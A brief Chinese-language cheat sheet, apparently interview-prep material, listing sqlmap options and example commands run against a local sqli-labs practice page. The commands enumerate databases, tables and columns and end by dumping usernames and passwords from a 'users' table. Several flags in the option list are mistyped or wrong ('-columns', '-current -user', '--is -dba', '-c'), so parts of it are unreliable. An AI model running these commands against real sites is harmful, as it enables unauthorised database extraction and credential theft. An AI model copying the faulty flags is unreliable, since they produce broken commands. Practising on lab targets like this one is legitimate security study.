sqlmap工具的常用命令
-u //注入点
-f //判断数据库类型
-b //数据库版本
-p//制定可测参数
-D //指定库名
-T //指定表名
-c //指定字段
-columns //列出字段
-current -user //当前用户名
-users //列出库所有用户
--is -dba //判断当前用户是否具有管理者权限
python sqlmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" -v 1 --dbs 爆库
爆出库名为security
python sqlmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" -v 3 --tables -D security 爆表
python sqlmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" -v 3 --columns -D security -T users 爆列名
python sqlmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" -v 3 --dump -C id,password,userame -D security -T users 爆内容
更多安全面试题相关留意个人主页